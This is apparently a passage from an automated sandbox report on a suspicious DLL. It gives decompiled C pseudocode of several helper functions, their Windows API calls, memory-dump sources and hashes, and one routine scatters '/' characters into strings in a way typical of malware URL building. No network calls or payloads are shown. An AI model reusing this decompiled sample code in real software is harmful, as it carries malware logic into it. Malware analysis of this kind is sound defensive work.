                                          				} while (_t42 == 0);
                                          				goto L15;
                                          			}
















                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 00C7A208
                                          • SetEvent.KERNEL32(?), ref: 00C7A218
                                          • GetLastError.KERNEL32 ref: 00C7A2A1
                                            • Part of subcall function 00C79D3A: WaitForMultipleObjects.KERNEL32(00000002,00C7AA33,00000000,00C7AA33,?,?,?,00C7AA33,0000EA60), ref: 00C79D55
                                            • Part of subcall function 00C7147E: HeapFree.KERNEL32(00000000,00000000,00C71D11,00000000,?,?,-00000008), ref: 00C7148A
                                          • GetLastError.KERNEL32(00000000), ref: 00C7A2D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 602384898-0
                                          • Opcode ID: 748e41b64c6266d983b2acb70271359da6b3faf365f6e475a8404eab509ed044
                                          • Instruction ID: 90aa917e8d9490865efd0365e0b966b29a0f99e65aec0808163eb5a45524aee8
                                          • Opcode Fuzzy Hash: 748e41b64c6266d983b2acb70271359da6b3faf365f6e475a8404eab509ed044
                                          • Instruction Fuzzy Hash: C8312FB5900309EFDB20DFE5CCC4A9EBBBCEF48301F10896AE55AA2152D7319B459F51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E00C754AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                          				intOrPtr _v12;
                                          				void* _v16;
                                          				void* _v28;
                                          				char _v32;
                                          				void* __esi;
                                          				void* _t29;
                                          				void* _t38;
                                          				signed int* _t39;
                                          				void* _t40;
                                          
                                          				_t36 = __ecx;
                                          				_v32 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v12 = _a4;
                                          				_t38 = E00C74F1F(__ecx,  &_v32);
                                          				if(_t38 != 0) {
                                          					L12:
                                          					_t39 = _a8;
                                          					L13:
                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                          						_t23 =  &(_t39[1]);
                                          						if(_t39[1] != 0) {
                                          							E00C75749(_t23);
                                          						}
                                          					}
                                          					return _t38;
                                          				}
                                          				if(E00C79138(0x40,  &_v16) != 0) {
                                          					_v16 = 0;
                                          				}
                                          				_t40 = CreateEventA(0xc7d2a8, 1, 0,  *0xc7d340);
                                          				if(_t40 != 0) {
                                          					SetEvent(_t40);
                                          					Sleep(0xbb8);
                                          					CloseHandle(_t40);
                                          				}
                                          				_push( &_v32);
                                          				if(_a12 == 0) {
                                          					_t29 = E00C79575(_t36);
                                          				} else {
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_t29 = E00C7A642(_t36);
                                          				}
                                          				_t41 = _v16;
                                          				_t38 = _t29;
                                          				if(_v16 != 0) {
                                          					E00C7568A(_t41);
                                          				}
                                          				if(_t38 != 0) {
                                          					goto L12;
                                          				} else {
                                          					_t39 = _a8;
                                          					_t38 = E00C772F2( &_v32, _t39);
                                          					goto L13;
                                          				}
                                          			}













                                          APIs
                                          • CreateEventA.KERNEL32(00C7D2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 00C754FD
                                          • SetEvent.KERNEL32(00000000), ref: 00C7550A
                                          • Sleep.KERNEL32(00000BB8), ref: 00C75515
                                          • CloseHandle.KERNEL32(00000000), ref: 00C7551C
                                            • Part of subcall function 00C79575: WaitForSingleObject.KERNEL32(00000000,?,?,?,00C7553C,?,00C7553C,?,?,?,?,?,00C7553C,?), ref: 00C7964F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 2559942907-0
                                          • Opcode ID: 07ff1814f24d53a560ea9239d176a82347717df35f57362b090ff6efd06c83dd
                                          • Instruction ID: 8e91508f92941c5cced8f4ab285fc28390a7a58cde151b829e602fdf1fca5056
                                          • Opcode Fuzzy Hash: 07ff1814f24d53a560ea9239d176a82347717df35f57362b090ff6efd06c83dd
                                          • Instruction Fuzzy Hash: 9B214572D00519EFCB50BFF5C8859AE77BAEF44350B05C429FA2AA7100DAB4DE418BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E00C74858(unsigned int __eax, void* __ecx) {
                                          				void* _v8;
                                          				void* _v12;
                                          				signed int _t21;
                                          				signed short _t23;
                                          				char* _t27;
                                          				void* _t29;
                                          				void* _t30;
                                          				unsigned int _t33;
                                          				void* _t37;
                                          				unsigned int _t38;
                                          				void* _t41;
                                          				void* _t42;
                                          				int _t45;
                                          				void* _t46;
                                          
                                          				_t42 = __eax;
                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                          				_t38 = __eax;
                                          				_t30 = RtlAllocateHeap( *0xc7d238, 0, (__eax >> 3) + __eax + 1);
                                          				_v12 = _t30;
                                          				if(_t30 != 0) {
                                          					_v8 = _t42;
                                          					do {
                                          						_t33 = 0x18;
                                          						if(_t38 <= _t33) {
                                          							_t33 = _t38;
                                          						}
                                          						_t21 =  *0xc7d250; // 0x2873e07d
                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                          						 *0xc7d250 = _t23;
                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                          						memcpy(_t30, _v8, _t45);
                                          						_v8 = _v8 + _t45;
                                          						_t27 = _t30 + _t45;
                                          						_t38 = _t38 - _t45;
                                          						_t46 = _t46 + 0xc;
                                          						 *_t27 = 0x2f;
                                          						_t13 = _t27 + 1; // 0x1
                                          						_t30 = _t13;
                                          					} while (_t38 > 8);
                                          					memcpy(_t30, _v8, _t38 + 1);
                                          				}
                                          				return _v12;
                                          			}


















                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00C74DBF,00000000,?,?,00C752FE,?,031395B0), ref: 00C74863
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00C7487B
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00C74DBF,00000000,?,?,00C752FE,?,031395B0), ref: 00C748BF
                                          • memcpy.NTDLL(00000001,?,00000001), ref: 00C748E0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: f89bd6053dc7c15e3f74bff7f10730b68c9a73297bfdc23b078d892a2b5ca7a6
                                          • Instruction ID: cfdd3a5d17bb3eba3801e2451eee7ea6fe67e266e776a428a22db01b9cee23c4
                                          • Opcode Fuzzy Hash: f89bd6053dc7c15e3f74bff7f10730b68c9a73297bfdc23b078d892a2b5ca7a6
                                          • Instruction Fuzzy Hash: 7911E372A00159ABC3148B69DC85E9EBBBEDB80350B05416AF509D7191E7709E4097A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E00C76AF7(intOrPtr _a4, intOrPtr _a8) {
                                          				char _v20;
                                          				void* _t8;
                                          				void* _t13;
                                          				void* _t16;
                                          				char* _t18;
                                          				void* _t19;
                                          
                                          				_t19 = 0x27;
                                          				_t1 =  &_v20; // 0x74666f53
                                          				_t18 = 0;
                                          				E00C76F89(_t8, _t1);
                                          				_t16 = E00C758BE(_t19);
                                          				if(_t16 != 0) {
                                          					_t3 =  &_v20; // 0x74666f53
                                          					_t13 = E00C79038(_t3, _t16, _a8);
                                          					if(_a4 != 0) {
                                          						__imp__(_a4);
                                          						_t19 = _t13 + 0x27;
                                          					}
                                          					_t18 = E00C758BE(_t19);
                                          					if(_t18 != 0) {
                                          						 *_t18 = 0;
                                          						if(_a4 != 0) {
                                          							__imp__(_t18, _a4);
                                          						}
                                          						__imp__(_t18, _t16);
                                          					}
                                          					E00C7147E(_t16);
                                          				}
                                          				return _t18;
                                          			}










                                          APIs
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                            • Part of subcall function 00C79038: wsprintfA.USER32 ref: 00C79094
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,00C72098,74666F53,00000000,?,00C7D00C,?,?), ref: 00C76B2D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00C76B51
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00C76B59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                          • String ID: Soft
                                          • API String ID: 393707159-3753413193
                                          • Opcode ID: 514a7e2289cd0cf063028f8978ae645b236c1b6cb1509d043702e98e4e91a623
                                          • Instruction ID: 616168c99bac41bd6801cf5ff2dd1264abf406f2c85006c3e9c0557ab4e5c24b
                                          • Opcode Fuzzy Hash: 514a7e2289cd0cf063028f8978ae645b236c1b6cb1509d043702e98e4e91a623
                                          • Instruction Fuzzy Hash: D801D632500506BBCB122BA89CC8FEF3B6CDF85341F048029FA1C96142DB74CA45E7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00C77283(void* __esi) {
                                          				struct _SECURITY_ATTRIBUTES* _v4;
                                          				void* _t8;
                                          				void* _t10;
                                          
                                          				_v4 = 0;
                                          				memset(__esi, 0, 0x38);
                                          				_t8 = CreateEventA(0, 1, 0, 0);
                                          				 *(__esi + 0x1c) = _t8;
                                          				if(_t8 != 0) {
                                          					_t10 = CreateEventA(0, 1, 1, 0);
                                          					 *(__esi + 0x20) = _t10;
                                          					if(_t10 == 0) {
                                          						CloseHandle( *(__esi + 0x1c));
                                          					} else {
                                          						_v4 = 1;
                                          					}
                                          				}
                                          				return _v4;
                                          			}







                                          APIs
                                          • memset.NTDLL ref: 00C77291
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 00C772A6
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00C772B3
                                          • CloseHandle.KERNEL32(?), ref: 00C772C5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: 98338d235a542bff178d6d610ab6fe5972730505b326cbd7284210b66daa4340
                                          • Instruction ID: 6744c7f69addd5c0866c9081a5cbe3a41c2fbc7650e113eac84fc1f2ffec24c6
                                          • Opcode Fuzzy Hash: 98338d235a542bff178d6d610ab6fe5972730505b326cbd7284210b66daa4340
                                          • Instruction Fuzzy Hash: 87F0FEB110430CFFD310AF66DCC4D2BBBACEB56298B118A2EF15692512D676A9055A70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E00C7A2EF(int __eax, char _a4) {
                                          				void* _v0;
                                          				void* _t12;
                                          				int _t13;
                                          				int _t14;
                                          
                                          				_t1 =  &_a4; // 0x4d283a53
                                          				_t14 = __eax;
                                          				__imp__( *_t1);
                                          				_t13 = __eax;
                                          				if(__eax > __eax) {
                                          					_t14 = __eax;
                                          				}
                                          				_t2 = _t14 + 1; // 0x1
                                          				_t12 = E00C758BE(_t2);
                                          				if(_t12 != 0) {
                                          					memcpy(_t12, _v0, _t13);
                                          					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
                                          				}
                                          				return _t12;
                                          			}








                                          APIs
                                          • lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,00C79AA8,00000000,00000005,00C7D00C,00000008,?,?,59935A40,?,?,59935A40), ref: 00C7A2F8
                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,00C74A8B,?,?,?,4D283A53,?,?), ref: 00C7A31B
                                          • memset.NTDLL ref: 00C7A32A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpymemset
                                          • String ID: S:(M
                                          • API String ID: 4042389641-2217774225
                                          • Opcode ID: 258133517182dc1dff3fb2cd8d63d978e14e97fe0557844a639d583ef54b95e2
                                          • Instruction ID: 43757703e08c36556463d6f104e5509fca92eb831943df205c8cd6f76f3360ee
                                          • Opcode Fuzzy Hash: 258133517182dc1dff3fb2cd8d63d978e14e97fe0557844a639d583ef54b95e2
                                          • Instruction Fuzzy Hash: 74E0E573A052126BC730AAB95CC9E4F2A9DDBC4350B008429FA1983205E670CD0492B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00C778AD() {
                                          				void* _t1;
                                          				intOrPtr _t5;
                                          				void* _t6;
                                          				void* _t7;
                                          				void* _t11;
                                          
                                          				_t1 =  *0xc7d26c; // 0x3e0
                                          				if(_t1 == 0) {
                                          					L8:
                                          					return 0;
                                          				}
                                          				SetEvent(_t1);
                                          				_t11 = 0x7fffffff;
                                          				while(1) {
                                          					SleepEx(0x64, 1);
                                          					_t5 =  *0xc7d2b8; // 0x0
                                          					if(_t5 == 0) {
                                          						break;
                                          					}
                                          					_t11 = _t11 - 0x64;
                                          					if(_t11 > 0) {
                                          						continue;
                                          					}
                                          					break;
                                          				}
                                          				_t6 =  *0xc7d26c; // 0x3e0
                                          				if(_t6 != 0) {
                                          					CloseHandle(_t6);
                                          				}
                                          				_t7 =  *0xc7d238; // 0x2d40000
                                          				if(_t7 != 0) {
                                          					HeapDestroy(_t7);
                                          				}
                                          				goto L8;
                                          			}









                                          APIs
                                          • SetEvent.KERNEL32(000003E0,00000001,00C76F2D), ref: 00C778B8
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 00C778C7
                                          • CloseHandle.KERNEL32(000003E0), ref: 00C778E8
                                          • HeapDestroy.KERNEL32(02D40000), ref: 00C778F8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: CloseDestroyEventHandleHeapSleep
                                          • String ID:
                                          • API String ID: 4109453060-0
                                          • Opcode ID: cdf67590b961762be0ad7b021f6c943ae99349526c78bd2b500443e297fc03d7
                                          • Instruction ID: df7bf230e9ab0a9a86983a92dbc2740d3edfa39d81b677ba9c5fc5983f296f33
                                          • Opcode Fuzzy Hash: cdf67590b961762be0ad7b021f6c943ae99349526c78bd2b500443e297fc03d7
                                          • Instruction Fuzzy Hash: 24F08C31A09306D7D7105B34DD8CB0A3BA8AF05750B048215B82EE72E1CF20CD81D6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E00C74C3A(void** __esi) {
                                          				char* _v0;
                                          				intOrPtr _t4;
                                          				intOrPtr _t6;
                                          				void* _t8;
                                          				intOrPtr _t11;
                                          				void* _t12;
                                          				void** _t14;
                                          
                                          				_t14 = __esi;
                                          				_t4 =  *0xc7d324; // 0x31395b0
                                          				__imp__(_t4 + 0x40);
                                          				while(1) {
                                          					_t6 =  *0xc7d324; // 0x31395b0
                                          					_t1 = _t6 + 0x58; // 0x0
                                          					if( *_t1 == 0) {
                                          						break;
                                          					}
                                          					Sleep(0xa);
                                          				}
                                          				_t8 =  *_t14;
                                          				if(_t8 != 0 && _t8 != 0xc7d030) {
                                          					HeapFree( *0xc7d238, 0, _t8);
                                          				}
                                          				_t14[1] = E00C77C75(_v0, _t14);
                                          				_t11 =  *0xc7d324; // 0x31395b0
                                          				_t12 = _t11 + 0x40;
                                          				__imp__(_t12);
                                          				return _t12;
                                          			}











                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(03139570), ref: 00C74C43
                                          • Sleep.KERNEL32(0000000A,?,?,?,00C74A8B,?,?,?,4D283A53,?,?), ref: 00C74C4D
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,00C74A8B,?,?,?,4D283A53,?,?), ref: 00C74C75
                                          • RtlLeaveCriticalSection.NTDLL(03139570), ref: 00C74C91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 8e05d9ad83e42f5c30b0ca061613ace04deb64e70acd4a3450ed43ad2e21369a
                                          • Instruction ID: 1ec59ed6f9365bac0f20921ea996a89cb2aa1ce721292ec1a7663e4e9a983908
                                          • Opcode Fuzzy Hash: 8e05d9ad83e42f5c30b0ca061613ace04deb64e70acd4a3450ed43ad2e21369a
                                          • Instruction Fuzzy Hash: 5DF0D470601241DBE72A9B79EE88B1E77F8AF24744F04C408F51FD6271DB20E981DB5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00C79B10() {
                                          				void* _v0;
                                          				void** _t3;
                                          				void** _t5;
                                          				void** _t7;
                                          				void** _t8;
                                          				void* _t10;
                                          
                                          				_t3 =  *0xc7d324; // 0x31395b0
                                          				__imp__( &(_t3[0x10]));
                                          				while(1) {
                                          					_t5 =  *0xc7d324; // 0x31395b0
                                          					_t1 =  &(_t5[0x16]); // 0x0
                                          					if( *_t1 == 0) {
                                          						break;
                                          					}
                                          					Sleep(0xa);
                                          				}
                                          				_t7 =  *0xc7d324; // 0x31395b0
                                          				_t10 =  *_t7;
                                          				if(_t10 != 0 && _t10 != 0xc7e845) {
                                          					HeapFree( *0xc7d238, 0, _t10);
                                          					_t7 =  *0xc7d324; // 0x31395b0
                                          				}
                                          				 *_t7 = _v0;
                                          				_t8 =  &(_t7[0x10]);
                                          				__imp__(_t8);
                                          				return _t8;
                                          			}










                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(03139570), ref: 00C79B19
                                          • Sleep.KERNEL32(0000000A,?,?,?,00C74A8B,?,?,?,4D283A53,?,?), ref: 00C79B23
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00C74A8B,?,?,?,4D283A53,?,?), ref: 00C79B51
                                          • RtlLeaveCriticalSection.NTDLL(03139570), ref: 00C79B66
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 8a5d1f92d03ee0836b5658a4ec79445beae364165191269d79d9f1857a626e05
                                          • Instruction ID: 3d91eff191ae3c16e7946e4471b6cad2be14dcdcd6ceacd8a5497db311b60829
                                          • Opcode Fuzzy Hash: 8a5d1f92d03ee0836b5658a4ec79445beae364165191269d79d9f1857a626e05
                                          • Instruction Fuzzy Hash: 03F06274600201DBEB289B65ED99F1D37F5EF59741B058118E90FD7270C630AD809A66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00C76B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                          				intOrPtr* _v8;
                                          				void* _t17;
                                          				intOrPtr* _t22;
                                          				void* _t27;
                                          				char* _t30;
                                          				void* _t33;
                                          				void* _t34;
                                          				void* _t36;
                                          				void* _t37;
                                          				void* _t39;
                                          				int _t42;
                                          
                                          				_t17 = __eax;
                                          				_t37 = 0;
                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                          				_t2 = _t17 + 1; // 0x1
                                          				_t28 = _t2;
                                          				_t34 = E00C758BE(_t2);
                                          				if(_t34 != 0) {
                                          					_t30 = E00C758BE(_t28);
                                          					if(_t30 == 0) {
                                          						E00C7147E(_t34);
                                          					} else {
                                          						_t39 = _a4;
                                          						_t22 = E00C7A8D2(_t39);
                                          						_v8 = _t22;
                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                          							_a4 = _t39;
                                          						} else {
                                          							_t26 = _t22 + 2;
                                          							_a4 = _t22 + 2;
                                          							_t22 = E00C7A8D2(_t26);
                                          							_v8 = _t22;
                                          						}
                                          						if(_t22 == 0) {
                                          							__imp__(_t34, _a4);
                                          							 *_t30 = 0x2f;
                                          							 *((char*)(_t30 + 1)) = 0;
                                          						} else {
                                          							_t42 = _t22 - _a4;
                                          							memcpy(_t34, _a4, _t42);
                                          							 *((char*)(_t34 + _t42)) = 0;
                                          							__imp__(_t30, _v8);
                                          						}
                                          						 *_a8 = _t34;
                                          						_t37 = 1;
                                          						 *_a12 = _t30;
                                          					}
                                          				}
                                          				return _t37;
                                          			}















                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,00C7A006,?,?,?,?,00000102,00C766AF,?,?,00000000), ref: 00C76B7A
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                            • Part of subcall function 00C7A8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00C76BA8,00000000,00000001,00000001,?,?,00C7A006,?,?,?,?,00000102), ref: 00C7A8E0
                                            • Part of subcall function 00C7A8D2: StrChrA.SHLWAPI(?,0000003F,?,?,00C7A006,?,?,?,?,00000102,00C766AF,?,?,00000000,00000000), ref: 00C7A8EA
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00C7A006,?,?,?,?,00000102,00C766AF,?), ref: 00C76BD8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00C76BE8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00C76BF4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: cfad7c657525b829f777426ca2205ecb492a7a4da8dc029fa7740953a155aac2
                                          • Instruction ID: bc4d4d4ffc91eda12fb28c33fbb0f33b18b6073d8e4ebc796644a21310d0f994
                                          • Opcode Fuzzy Hash: cfad7c657525b829f777426ca2205ecb492a7a4da8dc029fa7740953a155aac2
                                          • Instruction Fuzzy Hash: 4B21A2B2904656EFCB125FB5CC85AAE7FA8DF06380B15C054F94C9B212D771CA40A7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00C75FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                          				void* _v8;
                                          				void* _t18;
                                          				int _t25;
                                          				int _t29;
                                          				int _t34;
                                          
                                          				_t29 = lstrlenW(_a4);
                                          				_t25 = lstrlenW(_a8);
                                          				_t18 = E00C758BE(_t25 + _t29 + _t25 + _t29 + 2);
                                          				_v8 = _t18;
                                          				if(_t18 != 0) {
                                          					_t34 = _t29 + _t29;
                                          					memcpy(_t18, _a4, _t34);
                                          					_t10 = _t25 + 2; // 0x2
                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                          				}
                                          				return _v8;
                                          			}








                                          APIs
                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,0313937C,?,00C7694E,004F0053,0313937C,?,?,?,?,?,?,00C79C10), ref: 00C75FDB
                                          • lstrlenW.KERNEL32(00C7694E,?,00C7694E,004F0053,0313937C,?,?,?,?,?,?,00C79C10), ref: 00C75FE2
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,00C7694E,004F0053,0313937C,?,?,?,?,?,?,00C79C10), ref: 00C76002
                                          • memcpy.NTDLL(751469A0,00C7694E,00000002,00000000,004F0053,751469A0,?,?,00C7694E,004F0053,0313937C), ref: 00C76015
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpy$AllocateHeap
                                          • String ID:
                                          • API String ID: 2411391700-0
                                          • Opcode ID: 8c6be8f3b980ded6b205a1427aecf0c4be46124430f3a58618e79d9fd503a6bc
